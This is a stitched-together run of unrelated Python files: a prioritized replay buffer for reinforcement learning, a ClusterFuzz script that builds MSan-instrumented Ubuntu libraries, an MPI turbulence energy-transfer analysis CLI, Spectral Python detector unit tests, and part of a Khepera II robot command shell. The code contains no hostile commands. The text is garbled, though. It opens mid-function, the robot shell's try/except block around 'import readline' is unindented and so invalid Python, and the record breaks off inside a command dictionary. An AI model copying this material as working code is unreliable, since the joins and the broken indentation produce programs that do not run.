            indicies = [random.sample(list(range(sample*interval,(sample+1)*interval)),1)[0] for sample in range(self.batch_size)]
        priorities = self.priority_array[indicies]
        return priorities,indicies

    def update_priorities(self,TD_errors,indicies):
        """Recompute priorities for the given indices and refresh the sums."""
        priorities = (abs(TD_errors)+self.epsilon)**self.alpha
        self.priority_array[indicies] = priorities
        # Update sum; de-duplicate so each affected node is re-summed once.
        nodes = [self.intermediate_dict[index] for index in indicies]
        intermediate_nodes = set(nodes)
        [propogate(node,self.priority_array) for node in intermediate_nodes]
class Node(object):
    """Generic tree node holding a value plus parent/child links."""

    def __init__(self, parent):
        self.parent = parent
        self.children = []
        self.value = 0

    def add_child(self, child):
        """Register child under this node."""
        self.children.append(child)

    def set_value(self, value):
        """Overwrite this node's stored value."""
        self.value = value

    def sum_children(self):
        """Return the sum of the direct children's values."""
        return sum(child.value for child in self.children)

    def __len__(self):
        return len(self.children)
class Intermediate(Node):
    """Node that sums a fixed slice [start, end) of the priority array.

    Registers itself as a child of *parent* on construction.
    """

    def __init__(self, parent, start, end):
        # Initialise via Node so inherited helpers (add_child, sum_children,
        # __len__) see a valid `children` list; the original skipped this,
        # leaving `children` undefined on Intermediate instances.
        super().__init__(parent)
        self.start = start
        self.end = end
        parent.add_child(self)

    def sum_leafs(self, arr):
        """Return the sum of this node's slice of the priority array."""
        return np.sum(arr[self.start:self.end])
def propogate(node, arr):
    """Recompute node's value from arr and propagate the change upward.

    Intermediate nodes re-sum their slice of the priority array via
    ``sum_leafs``; the root (whose parent is None) re-sums its children
    once the recursion reaches it.
    """
    if node.parent is not None:  # `is not None` rather than `!= None`
        node.value = node.sum_leafs(arr)
        propogate(node.parent, arr)
    else:
        node.value = node.sum_children()
"""
Priority Buffer HyperParameters
alpha(priority or w) dictates how biased the sampling should be towards the TD error. 0 < a < 1
beta(IS) informs the importance of the sample update
The paper uses a sum tree to calculate the priority sum in O(log n) time. As such, i've implemented my own version
of the sum_tree which i call priority tree.
We're increasing beta(IS) from 0.5 to 1 over time
alpha(priority) we're holding constant at 0.5
"""
class PriorityReplayBuffer(object):
    """Experience replay buffer with proportional prioritisation.

    Priorities live in a PriorityTree (a sum-tree analogue); the
    importance-sampling exponent beta is annealed linearly from ``beta``
    to ``beta_end`` over ``beta_duration`` sampling calls.
    """

    def __init__(self, action_size, buffer_size, batch_size, seed, alpha=0.5, beta=0.5, beta_end=1, beta_duration=1e+5, epsilon=7e-5):
        self.seed = random.seed(seed)
        self.action_size = action_size
        self.buffer_size = buffer_size
        self.batch_size = batch_size
        self.alpha = alpha
        self.beta = beta
        self.beta_end = beta_end
        self.beta_duration = beta_duration
        # Linear annealing schedule for the importance-sampling exponent.
        self.beta_increment = (beta_end - beta) / beta_duration
        # Running maximum importance weight, used to normalise weights <= 1.
        self.max_w = 0
        self.epsilon = epsilon
        self.TD_sum = 0
        self.device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
        self.experience = namedtuple('experience', field_names=['state', 'action', 'reward', 'next_state', 'done', 'i_episode'])
        self.sum_tree = PriorityTree(buffer_size, batch_size, alpha, epsilon)
        self.memory = {}

    def add(self, state, action, reward, next_state, done, TD_error, i_episode):
        """Store a transition and its priority; the index wraps at buffer_size."""
        e = self.experience(state, action, reward, next_state, done, i_episode)
        index = i_episode % self.buffer_size
        # add memory to memory and add corresponding priority to the priority tree
        self.memory[index] = e
        self.sum_tree.add(TD_error, index)

    def sample(self, index):
        """Sample a prioritised batch as torch tensors.

        Parameters
        ----------
        index: int
            Current episode counter; forwarded to the tree's sampler and
            used to gate periodic debug output.

        Returns
        -------
        ((states, actions, rewards, next_states, dones), indicies, norm_importances)
        """
        # Anneal beta towards beta_end before computing importance weights.
        self.update_beta()
        # Get the sampled priorities and their indices from the tree.
        priorities, indicies = self.sum_tree.sample(index)
        # Normalise by the tree root (the total priority mass) to get probabilities.
        norm_priorities = priorities / self.sum_tree.root.value
        samples = [self.memory[i] for i in indicies]
        # Importance-sampling weights (P(i) * N)^-beta, normalised by the
        # largest weight observed so far so updates stay <= 1.
        importances = [(priority * self.buffer_size) ** -self.beta for priority in norm_priorities]
        self.max_w = max(self.max_w, max(importances))
        norm_importances = [importance / self.max_w for importance in importances]
        states = torch.from_numpy(np.vstack([e.state for e in samples if e is not None])).float().to(self.device)
        actions = torch.from_numpy(np.vstack([e.action for e in samples if e is not None])).long().to(self.device)
        rewards = torch.from_numpy(np.vstack([e.reward for e in samples if e is not None])).float().to(self.device)
        next_states = torch.from_numpy(np.vstack([e.next_state for e in samples if e is not None])).float().to(self.device)
        dones = torch.from_numpy(np.vstack([e.done for e in samples if e is not None]).astype(int)).float().to(self.device)
        if index % 4900 == 0:
            # NOTE(review): periodic debug logging retained from the original.
            print('beta', self.beta)
            print('self.max_w', self.max_w)
            print('len mem', len(self.memory))
            print('tree sum', self.sum_tree.root.value)
        return (states, actions, rewards, next_states, dones), indicies, norm_importances

    def update_beta(self):
        """Increase beta by one annealing step, clamped at beta_end."""
        self.beta += self.beta_increment
        self.beta = min(self.beta, self.beta_end)

    def __len__(self):
        # len(dict) directly; the .keys() wrapper was redundant.
        return len(self.memory)
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Build MSan instrumented libs on Google Container Builder."""
# Usage:
# 1. build_msan_libs.py [--no-track-origins] build_packages
# 2. Wait for builds to complete on
# https://console.cloud.google.com/gcr/builds?project=google.com:clusterfuzz
# 3. Once all builds have succeeded, run:
# build_msan_libs.py [--no-track-origins] merge
import argparse
import datetime
from googleapiclient.discovery import build
# GCS bucket and distro configuration for the MSan library builds.
UPLOAD_BUCKET = 'clusterfuzz-chromium-msan-libs'
DISTRO_VERSION = '16.04'
# Cloud Build timeout: 2 hours, in seconds.
BUILD_TIMEOUT = 2 * 60 * 60

# For Chromium on Ubuntu 16.04
# Runtime library packages to rebuild with MSan instrumentation.
PACKAGES = [
    'libappindicator3-1',
    'libasound2',
    'libatk1.0-0',
    'libatk-bridge2.0-0',
    'libatspi2.0-0',
    'libavahi-client3',
    'libavahi-common3',
    'libcairo2',
    'libcairo-gobject2',
    'libcap2',
    'libcomerr2',
    'libcroco3',
    'libcups2',
    'libdatrie1',
    'libdbus-1-3',
    'libdbusmenu-glib4',
    'libdbusmenu-gtk3-4',
    'libepoxy0',
    'libexpat1',
    'libffi6',
    'libfontconfig1',
    'libfreetype6',
    'libgcrypt20',
    'libgdk-pixbuf2.0-0',
    'libglib2.0-0',
    'libgmp10',
    'libgnutls30',
    'libgpg-error0',
    'libgraphite2-3',
    'libgssapi-krb5-2',
    'libgtk-3-0',
    'libharfbuzz0b',
    'libhogweed4',
    'libidn11',
    'libido3-0.1-0',
    'libindicator3-7',
    'libk5crypto3',
    'libkeyutils1',
    'libkrb5-3',
    'libkrb5support0',
    'liblz4-1',
    'liblzma5',
    'libnettle6',
    'libnspr4',
    'libnss3',
    'libp11-kit0',
    'libpango-1.0-0',
    'libpangocairo-1.0-0',
    'libpangoft2-1.0-0',
    'libpci3',
    'libpcre3',
    'libpixman-1-0',
    'libpng12-0',
    'libpulse0',
    'librsvg2-2',
    'libselinux1',
    'libsqlite3-0',
    'libsystemd0',
    'libtasn1-6',
    'libthai0',
    'libudev1',
    'libwayland-client0',
    'libwayland-cursor0',
    'libx11-6',
    'libx11-xcb1',
    'libxau6',
    'libxcb1',
    'libxcb-render0',
    'libxcb-shm0',
    'libxcomposite1',
    'libxcursor1',
    'libxdamage1',
    'libxdmcp6',
    'libxext6',
    'libxfixes3',
    'libxi6',
    'libxinerama1',
    'libxkbcommon0',
    'libxml2',
    'libxrandr2',
    'libxrender1',
    'libxss1',
    'libxtst6',
    'zlib1g',
]
def bucket_path(no_track_origins):
    """Return the bucket path to upload to."""
    # Origin-tracking mode determines which subdirectory the libs land in.
    subdir = 'no-origins' if no_track_origins else 'chained-origins'
    return 'gs://%s/%s/%s' % (UPLOAD_BUCKET, DISTRO_VERSION, subdir)
def build_steps(package_name, no_track_origins=False):
    """Return Cloud Build steps that build, zip and upload one package."""
    zip_name = '%s.zip' % package_name
    build_args = ['msan_build.py', '--no-build-deps', package_name, '/workspace']
    if no_track_origins:
        build_args.append('--no-track-origins')
    builder = 'gcr.io/oss-fuzz-base/base-msan-builder'
    upload_dest = '%s/packages/%s' % (bucket_path(no_track_origins), zip_name)
    return [
        # Build the package with OSS-Fuzz's MSan builder.
        {
            'args': build_args,
            'name': builder,
        },
        # Zip the build results.
        {
            'args': ['zip', '-r', '-y', zip_name, '.'],
            'name': builder,
        },
        # Upload the zip to GCS.
        {
            'args': ['cp', zip_name, upload_dest],
            'name': 'gcr.io/cloud-builders/gsutil',
        },
    ]
def get_build(steps):
    """Wrap a list of steps into a Cloud Build request body."""
    # Cloud Build expects the timeout as a string with an 's' suffix.
    return {
        'steps': steps,
        'timeout': '%ds' % BUILD_TIMEOUT,
        'options': {'machineType': 'N1_HIGHCPU_8'},
    }
def merge_steps(no_track_origins=False):
    """Get merge steps to merge individual packages into a single zip."""
    # datetime.utcnow() is deprecated; an aware UTC timestamp formats to the
    # same '%Y%m%d%H%M' string.
    timestamp = datetime.datetime.now(datetime.timezone.utc).strftime('%Y%m%d%H%M')
    filename = 'latest-%s.zip' % timestamp
    gsutil = 'gcr.io/cloud-builders/gsutil'
    builder = 'gcr.io/oss-fuzz-base/base-msan-builder'
    return [
        {
            # Download all individual packages.
            'args': [
                '-m', 'cp', '-r',
                bucket_path(no_track_origins) + '/packages/', '.'
            ],
            'name': gsutil,
        },
        {
            # Extract every package zip into ./all.
            'args': [
                'bash',
                '-c',
                'mkdir all && cd all && unzip -o "../packages/*.zip"',
            ],
            'name': builder,
        },
        {
            # Zip all shared objects into a single archive.
            'args': [
                'bash', '-c',
                'find -L -name \'*.so*\' | zip -y %s -@' % filename
            ],
            'dir': 'all',
            'name': builder,
        },
        {
            # Upload the merged archive.
            'args': [
                'cp',
                filename,
                bucket_path(no_track_origins) + '/' + filename,
            ],
            'dir': 'all',
            'name': gsutil,
        },
    ]
def start_build(cloudbuild, build_body):
    """Submit build_body to Cloud Build and return the new build's id."""
    request = cloudbuild.projects().builds().create(
        projectId='google.com:clusterfuzz', body=build_body)
    build_info = request.execute()
    return build_info['metadata']['build']['id']
def main():
    """Parse arguments and kick off either the package builds or the merge."""
    parser = argparse.ArgumentParser(
        'build_msan_libs.py', description='MSan builder.')
    parser.add_argument(
        '--no-track-origins',
        action='store_true',
        help='Build with -fsanitize-memory-track-origins=0.')
    parser.add_argument(
        'command',
        choices=['build_packages', 'merge'],
        help='The command to run.')
    args = parser.parse_args()

    cloudbuild = build('cloudbuild', 'v1', cache_discovery=False)

    if args.command == 'merge':
        print(
            start_build(cloudbuild, get_build(merge_steps(args.no_track_origins))))
        return

    # build_packages: start one Cloud Build per package.
    for package in PACKAGES:
        body = get_build(build_steps(package, args.no_track_origins))
        print(start_build(cloudbuild, body))


if __name__ == '__main__':
    main()
|
# repo: Carlson-J/energy-transfer-analysis
import argparse
from mpi4py import MPI
import FFTHelperFuncs
from IOhelperFuncs import read_fields
from EnergyTransfer import EnergyTransfer
from FlowAnalysis import FlowAnalysis
import os
import sys
import pickle
import numpy as np
# Build the command-line interface; every later configuration value is read
# from the resulting `args` dictionary.
cli = argparse.ArgumentParser(
    description="MPI parallel turbulence simulation analysis",
    epilog="Full documentation of options available at "
           "https://github.com/pgrete/energy-transfer-analysis")

cli.add_argument('--res', required=True, type=int,
                 help='set linear resolution of cubic box')
cli.add_argument('--type', required=True, type=str,
                 choices=['transfer', 'flow', 'unit-test'],
                 help='set analysis type')
cli.add_argument('--data_type', required=True, type=str,
                 choices=['Enzo', 'AthenaPP', 'AthenaPPHDF', 'AthenaHDFC',
                          'Athena'],
                 help='set data cube type')
cli.add_argument('--data_path', required=True, type=str,
                 help='set data location')
cli.add_argument('--outfile', type=str, default=None,
                 help='set file to store results')
cli.add_argument('--extrema_file', type=str,
                 help='Pickled Python dict containing extrema for flow analysis')
cli.add_argument('-b', action='store_true', default=False,
                 help='enable magnetic fields')
cli.add_argument('-forced', action='store_true', default=False,
                 help='output is actively forced')
cli.add_argument('--eos', required=True, type=str,
                 choices=['isothermal', 'adiabatic'],
                 help='set equation of state')
cli.add_argument('--gamma', type=float, default=None,
                 help='set adiabatic gamma index')
cli.add_argument('-approx-isothermal', action='store_true', default=False,
                 help='assume c_s^2 / gamma = p/rho = 1')
cli.add_argument('--terms', type=str, nargs='+', default=None,
                 choices=['All', 'Int', 'UU', 'BUT', 'BUP', 'UBT', 'UBPb',
                          'BB', 'BUPbb', 'UBPbb', 'SS', 'SU', 'US', 'PU', 'FU'],
                 help='set energy transfer terms to analyze')
cli.add_argument('--binning', default=None, type=str,
                 choices=['log', 'lin', 'test'],
                 help='set binning used in energy transfer analysis')
cli.add_argument('--kernels', default=None, type=str, nargs='+',
                 choices=['Box', 'Sharp', 'Gauss'],
                 help='choose convolution kernel type(s): Box, Sharp, or Gauss')

args = vars(cli.parse_args())
# Check equation of state parameters
if args['eos'] == 'adiabatic' and args['gamma'] is None:
    raise SystemExit('Please set gamma for when using adiabatic EOS')

# Check energy transfer arguments: --terms and --binning only make sense
# (and are mandatory) for --type transfer.
if args['type'] != 'transfer' and args['terms'] is not None:
    raise SystemExit('--terms to analyze set but --type is not transfer')

if args['type'] == 'transfer' and args['terms'] is None:
    raise SystemExit('Asking for energy transfer analysis but no terms chosen')

if args['type'] == 'transfer' and args['binning'] is None:
    raise SystemExit('Asking for energy transfer analysis but no binning chosen')

# Set mpi vars
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
size = comm.Get_size()
# Parse energy transfer arguments
resolution = args['res']

if args['type'] == 'transfer':
    magnetic_terms = ['BB', 'BUT', 'BUP', 'UBT', 'UBPb']
    # Work on a copy so that expanding the 'All'/'Int' shorthands below does
    # not mutate the list stored in args['terms'].
    terms_to_analyze = list(args['terms'])

    # 'All' expands to all kinetic (and, with -b, magnetic) terms.
    if 'All' in terms_to_analyze:
        terms_to_analyze += ['UU']
        if args['b']:
            terms_to_analyze += magnetic_terms
        while 'All' in terms_to_analyze:
            terms_to_analyze.remove('All')

    # 'Int' expands to the internal energy terms.
    if 'Int' in terms_to_analyze:
        terms_to_analyze += ['SS', 'US', 'SU']
        while 'Int' in terms_to_analyze:
            terms_to_analyze.remove('Int')

    # remove duplicates introduced by the expansions above
    terms_to_analyze = list(set(terms_to_analyze))

    for this_term in magnetic_terms:
        if this_term in terms_to_analyze and not args['b']:
            raise SystemExit(
                'Asking for magnetic energy transfer analysis but ' +
                'data is identified as not containing magnetic fields.\n' +
                'Try adding the -b if the simulation contains magnetic fields.'
            )

    if 'FU' in terms_to_analyze and not args['forced']:
        raise SystemExit(
            'Asking for acceleration field energy transfer analysis but ' +
            'data is identified as not containing acceleration fields.\n' +
            'Try adding the -forced if the simulation contains acceleration fields.'
        )

    if args['binning'] == 'lin':
        # np.linspace requires an integer sample count; `resolution/2` is a
        # float under Python 3 and raises a TypeError in modern numpy, so use
        # floor division.
        num_lin_bins = resolution // 2
        bins = np.concatenate((np.linspace(0.5, resolution/2 - 0.5,
                                           num_lin_bins, endpoint=True),
                               [float(resolution)/2.*np.sqrt(3)]))
    elif args['binning'] == "log":
        resolution_exp = np.log(resolution/8)/np.log(2) * 4 + 1
        bins = np.concatenate(
            (np.array([0.]),
             4. * 2**((np.arange(0, resolution_exp + 1) - 1.)/4.)))
    elif args['binning'] == "test":
        bins = [0.5, 1.5, 2.5, 16.0, 26.5, 28.5, 32.0]
    else:
        raise SystemExit('Binning undetermined')

if args['outfile'] is None and args['type'] != 'unit-test':
    raise SystemExit('Outfile required for analysis.')
outfile = args['outfile']

# gamma is only meaningful for an adiabatic equation of state
if args['eos'] == 'adiabatic':
    gamma = args['gamma']
else:
    gamma = None
# Setup FFTs. Using real->complex transforms for performance in the transfer
# analysis and because all quantities are also transformed back.
# Using complex->complex transforms for the flow analysis so that the total
# power in real and spectral space is identical without normalizing for
# power in the complex conjugate modes.
if args['type'] == 'transfer':
    FFTHelperFuncs.setup_fft(args['res'], dtype=np.float64)
else:
    FFTHelperFuncs.setup_fft(args['res'], dtype=np.complex128)

# Load data to data dictionary
fields = read_fields(args)

# Run energy transfer analysis
if args['type'] == 'transfer':
    ET = EnergyTransfer(MPI, resolution, fields, gamma)

    # only rank 0 touches the results file; other ranks pass None
    if rank == 0:
        if os.path.isfile(outfile):
            print("Reading previous transfer file")
            # use a context manager so the file handle is not leaked
            with open(outfile, "rb") as transfer_file:
                if sys.version_info[0] < 3:
                    results = pickle.load(transfer_file)
                else:
                    results = pickle.load(transfer_file, encoding='latin1')
        else:
            results = {}
    else:
        results = None

    # theoretically k and q binning could be independent
    k_bins = bins
    q_bins = bins

    ET.getTransferWWAnyToAny(results, k_bins, q_bins, terms_to_analyze)

    if rank == 0:
        with open(outfile, "wb") as transfer_file:
            pickle.dump(results, transfer_file)

elif args['type'] == 'flow':
    FA = FlowAnalysis(MPI, args, fields)
    FA.run_analysis()

elif args['type'] == 'unit-test':
    FA = FlowAnalysis(MPI, args, fields)
    FA.run_test()

else:
    raise SystemExit('Unknown transfer type: ', args['type'])
|
<reponame>satish1901/Methane-detection-from-hyperspectral-imagery
#########################################################################
#
# detectors.py - This file is part of the Spectral Python (SPy) package.
#
# Copyright (C) 2013 <NAME>
#
# Spectral Python is free software; you can redistribute it and/
# or modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# Spectral Python is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software; if not, write to
#
# Free Software Foundation, Inc.
# 59 Temple Place, Suite 330
# Boston, MA 02111-1307
# USA
#
#########################################################################
#
# Send comments to:
# <NAME>, <EMAIL>
#
'''Runs unit tests for various target detectors
To run the unit tests, type the following from the system command line:
# python -m spectral.tests.detectors
'''
from __future__ import division, print_function, unicode_literals
import numpy as np
from numpy.testing import assert_allclose
from .spytest import SpyTest
import spectral as spy
class MatchedFilterTest(SpyTest):
    '''Tests for the MatchedFilter target detector.'''

    def setup(self):
        from spectral.algorithms.detectors import MatchedFilter
        self.data = spy.open_image('92AV3C.lan').load()
        self.background = spy.calc_stats(self.data)
        # pixel used as the detection target throughout these tests
        self.target_ij = [33, 87]
        (i, j) = self.target_ij
        self.mf = MatchedFilter(self.background, self.data[i, j])

    def test_mf_bg_eq_zero(self):
        '''Matched Filter response of background should be zero.'''
        np.testing.assert_approx_equal(self.mf(self.background.mean), 0)

    def test_mf_target_eq_one(self):
        '''Matched Filter response of target should be one.'''
        from spectral.algorithms.detectors import matched_filter
        (i, j) = self.target_ij
        target = self.data[i, j]
        mf = matched_filter(self.data, target, self.background)
        np.testing.assert_approx_equal(mf[i, j], 1)

    def test_mf_target_no_bg_eq_one(self):
        '''Matched Filter response of target should be one (background
        estimated from the image itself).'''
        from spectral.algorithms.detectors import matched_filter
        (i, j) = self.target_ij
        target = self.data[i, j]
        mf = matched_filter(self.data, target)
        np.testing.assert_approx_equal(mf[i, j], 1)

    def test_mf_target_pixel_eq_one(self):
        '''Matched Filter response of target pixel should be one.'''
        (i, j) = self.target_ij
        np.testing.assert_approx_equal(self.mf(self.data)[i, j], 1)

    def test_mf_windowed_target_eq_one(self):
        '''Windowed Matched Filter response of target pixel should be one.'''
        X = self.data[:10, :10, :]
        ij = (3, 3)
        y = spy.matched_filter(X, X[ij], window=(3, 7), cov=self.background.cov)
        # The original discarded np.allclose's return value, so this test
        # could never fail; assert the result explicitly.
        assert np.allclose(1, y[ij])
class RXTest(SpyTest):
    '''Tests for the RX anomaly detector.'''

    def setup(self):
        self.data = spy.open_image('92AV3C.lan').load()
        self.background = spy.calc_stats(self.data)

    def test_rx_bg_eq_zero(self):
        '''RX score of the background mean should be zero.'''
        from spectral.algorithms.detectors import rx
        # Exercise the full-image code path (the previous unused `d = ...`
        # binding and the unused `RX` import have been removed).
        rx(self.data)
        stats = spy.calc_stats(self.data)
        np.testing.assert_approx_equal(rx(stats.mean, background=stats), 0)
class ACETest(SpyTest):
    '''Tests for the Adaptive Cosine/Coherence Estimator (ACE) detector.'''

    def setup(self):
        self.data = spy.open_image('92AV3C.lan').load()
        self.bg = spy.calc_stats(self.data)
        self.X = self.data[:20, :20, :]

    def test_ace_bg_eq_zero(self):
        '''ACE score of background mean should be zero.'''
        score = spy.ace(self.bg.mean, self.X[10, 10], background=self.bg)
        assert np.allclose(0, score)

    def test_ace_pixel_target_eq_one(self):
        '''ACE score of target should be one for single pixel arg.'''
        score = spy.ace(self.X[10, 10], self.X[10, 10], background=self.bg)
        assert np.allclose(1, score)

    def test_ace_novec_pixel_target_eq_one(self):
        '''ACE score of target should be one for single pixel arg
        (vectorization disabled).'''
        score = spy.ace(self.X[10, 10], self.X[10, 10], background=self.bg,
                        vectorize=False)
        assert np.allclose(1, score)

    def test_ace_target_eq_one(self):
        '''ACE score of target should be one.'''
        scores = spy.ace(self.X, self.X[10, 10], background=self.bg)
        assert np.allclose(1, scores[10, 10])

    def test_ace_novec_target_eq_one(self):
        '''ACE score (without vectorization) of target should be one.'''
        scores = spy.ace(self.X, self.X[10, 10], background=self.bg,
                         vectorize=False)
        assert np.allclose(1, scores[10, 10])

    def test_ace_multi_targets_eq_one(self):
        '''ACE score of multiple targets should each be one.'''
        first, second = (10, 10), (3, 12)
        scores = spy.ace(self.X, [self.X[first], self.X[second]],
                         background=self.bg)
        assert np.allclose(1, [scores[first][0], scores[second][1]])

    def test_ace_novec_multi_targets_eq_one(self):
        '''ACE score of multiple targets should each be one
        (vectorization disabled).'''
        first, second = (10, 10), (3, 12)
        scores = spy.ace(self.X, [self.X[first], self.X[second]],
                         background=self.bg, vectorize=False)
        assert np.allclose(1, [scores[first][0], scores[second][1]])

    def test_ace_multi_targets_bg_eq_zero(self):
        '''ACE score of background for multiple targets should be zero.'''
        first, second = (10, 10), (3, 12)
        scores = spy.ace(self.bg.mean, [self.X[first], self.X[second]],
                         background=self.bg)
        assert np.allclose(0, scores)

    def test_ace_subspace_targets_eq_one(self):
        '''ACE score of targets defining target subspace should each be one.'''
        first, second = (10, 10), (3, 12)
        scores = spy.ace(self.X, np.array([self.X[first], self.X[second]]),
                         background=self.bg)
        assert np.allclose(1, [scores[first], scores[second]])

    def test_ace_novec_subspace_targets_eq_one(self):
        '''ACE score of subspace targets should each be one
        (vectorization disabled).'''
        first, second = (10, 10), (3, 12)
        scores = spy.ace(self.X, np.array([self.X[first], self.X[second]]),
                         background=self.bg, vectorize=False)
        assert np.allclose(1, [scores[first], scores[second]])

    def test_ace_subspace_bg_eq_zero(self):
        '''ACE score of background for target subspace should be zero.'''
        first, second = (10, 10), (3, 12)
        scores = spy.ace(self.bg.mean,
                         np.array([self.X[first], self.X[second]]),
                         background=self.bg)
        assert np.allclose(0, scores)

    def test_ace_windowed_target_eq_one(self):
        '''ACE score of target for windowed background should be one.'''
        scores = spy.ace(self.X, self.X[10, 10], window=(3, 7),
                         cov=self.bg.cov)
        assert np.allclose(1, scores[10, 10])
def run():
    """Execute all target detector test suites."""
    divider = '-' * 72
    print('\n' + divider)
    print('Running target detector tests.')
    print(divider)
    for suite in (MatchedFilterTest, RXTest, ACETest):
        suite().run()


if __name__ == '__main__':
    from spectral.tests.run import parse_args, reset_stats, print_summary
    parse_args()
    reset_stats()
    run()
    print_summary()
|
#! /usr/bin/env python
################################################################################
#
# KheBaseShell.py
#
""" Khepera II Base Command-Line Shell Module
Khepera II base serial command-line shell provides a command-line
interface to most of the commands available on the Khepera II
base robot.
This shell is GuiTerm auto-capable.
Author: <NAME>
Email: <EMAIL>
URL: http://www.roadnarrowsrobotics.com
Date: 2005.12.24
Copyright (C) 2005, 2006. RoadNarrows LLC.
"""
#
# All Rights Reserved
#
# Permission is hereby granted, without written agreement and without
# license or royalty fees, to use, copy, modify, and distribute this
# software and its documentation for any purpose, provided that
# (1) The above copyright notice and the following two paragraphs
# appear in all copies of the source code and (2) redistributions
# including binaries reproduces these notices in the supporting
# documentation. Substantial modifications to this software may be
# copyrighted by their authors and need not follow the licensing terms
# described here, provided that the new terms are clearly indicated in
# all files where they apply.
#
# IN NO EVENT SHALL THE AUTHOR, ROADNARROWS LLC, OR ANY MEMBERS/EMPLOYEES
# OF ROADNARROW LLC OR DISTRIBUTORS OF THIS SOFTWARE BE LIABLE TO ANY
# PARTY FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL
# DAMAGES ARISING OUT OF THE USE OF THIS SOFTWARE AND ITS DOCUMENTATION,
# EVEN IF THE AUTHORS OR ANY OF THE ABOVE PARTIES HAVE BEEN ADVISED OF
# THE POSSIBILITY OF SUCH DAMAGE.
#
# THE AUTHOR AND ROADNARROWS LLC SPECIFICALLY DISCLAIM ANY WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
# FITNESS FOR A PARTICULAR PURPOSE. THE SOFTWARE PROVIDED HEREUNDER IS ON AN
# "AS IS" BASIS, AND THE AUTHORS AND DISTRIBUTORS HAVE NO OBLIGATION TO
# PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR MODIFICATIONS.
#
################################################################################
try:
import readline # optional module
except ImportError:
pass
import Fusion.Gui.GuiTypes as gt
import Fusion.Gui.GuiWinShell as gterm
import Fusion.Khepera.Cmd.KheCmdBase as KheCmdBase
import Fusion.Utils.Shell as Shell
import Fusion.Khepera.Shells.KheRawShell as KheRawShell
#-------------------------------------------------------------------------------
# Global Data
#-------------------------------------------------------------------------------
# command arguments
ReArgIncRaw = Shell.ReX('incraw')  # matches the optional 'incraw' keyword argument
#-------------------------------------------------------------------------------
# CLASS: KheBaseShell
#-------------------------------------------------------------------------------
class KheBaseShell(KheRawShell.KheRawShell):
  """ Khepera Base Shell Class.

      Extends the raw shell with commands for most of the Khepera II base
      robot operations (motion, odometry, sensors, extension bus, turrets).
  """

  #--
  def __init__(self, args=(), **kwargs):
    """ Initialize Base Shell.

        Parameters:
          args    - arguments (not used)
          kwargs  - dictionary of shell options arguments
            robotCmds   - Robot commands object. Default: KheCmdBase()
            **shopts    - Shell raw and core options.
    """
    # initialize shell base object
    KheRawShell.KheRawShell.__init__(self, args, **kwargs)

  #--
  def Config(self, **kwargs):
    """ Configure Options Override.

        Parameters:
          kwargs  - dictionary of options arguments
    """
    # this shell arguments defaults
    dfts = {
      'argv0': __file__,
      'shName': 'Khepera Base',
      'shVersion': '1.1',
      'shPS1': 'khebase$ ',
      'shPS2': 'khebase> ',
      'robotCmds': None
    }

    # set shell argument defaults, but caller has precedence
    for key, value in dfts.items():
      if key not in kwargs or not kwargs[key]:
        if key == 'robotCmds':
          kwargs[key] = KheCmdBase.KheCmdBase()
        else:
          kwargs[key] = value

    # set all options from arguments
    KheRawShell.KheRawShell.Config(self, **kwargs)

  # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  # The Command Dictionary (See Shell.py)
  # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  #--
  def InitCmdDict(self):
    """ Initialize Command Dictionary Override.

        Return Value:
          None
    """
    # set shell base object's commands
    KheRawShell.KheRawShell.InitCmdDict(self)

    # this shell's additional or override commands
    cmds = {
      # version command
      'version': {
        'help': {
          'desc': "Get Khepera OS version.",
          'usage': "version",
          'rvals': "OS version 2-tuple (<verBios>, <verProtocol>)."
        },
        'parse': [
          { 'refmt': Shell.ReStart + Shell.ReEnd,
            'cvt': []
          }
        ],
        'prereq': [self.PreReqOpen],
        'exec': self.CmdGetVersion
      },

      # setspeed command
      'setspeed': {
        'help': {
          'desc': "Set Khepera's speed.",
          'usage': "setspeed <motorLeft> <motorRight>",
          'args': {
            '<motorLeft>': "Left motor speed in mm/s [-1000.0, 1000.0]",
            '<motorRight>': "Right motor speed in mm/s [-1000.0, 1000.0]"
          },
          'rvals': "New speed 2-tuple (<motorLeft>, <motorRight>)."
        },
        'parse': [
          { 'refmt': Shell.ReStart + Shell.ReArgFloat + Shell.ReArgFloat +
                     Shell.ReEnd,
            'cvt': [self.CvtFloat]
          }
        ],
        'prereq': [self.PreReqOpen],
        'exec': self.CmdSetSpeed
      },

      # stop command
      'stop': {
        'help': {
          'desc': "Stop Khepera's motion.",
          'usage': "stop",
          'rvals': "Stopped speed 2-tuple (0, 0)."
        },
        'parse': [
          { 'refmt': Shell.ReStart + Shell.ReEnd,
            'cvt': []
          }
        ],
        'prereq': [self.PreReqOpen],
        'exec': self.CmdStop
      },

      # forward command
      'forward': {
        'help': {
          'desc': "Move Khepera forward at the specified speed.",
          'usage': "forward <motor>",
          'args': {
            '<motor>': "Left and right motor speeds in mm/s [0.0, 1000.0].",
          },
          'rvals': "New speed 2-tuple (<motor>, <motor>)."
        },
        'parse': [
          { 'refmt': Shell.ReStart + Shell.ReArgFloat + Shell.ReEnd,
            'cvt': [self.CvtFloat]
          }
        ],
        'prereq': [self.PreReqOpen],
        'exec': self.CmdForward
      },

      # backward command
      'backward': {
        'help': {
          'desc': "Move Khepera backward at the specified speed.",
          'usage': "backward <motor>",
          'args': {
            '<motor>': "Left and right motor speeds [0.0, 1000.0].",
          },
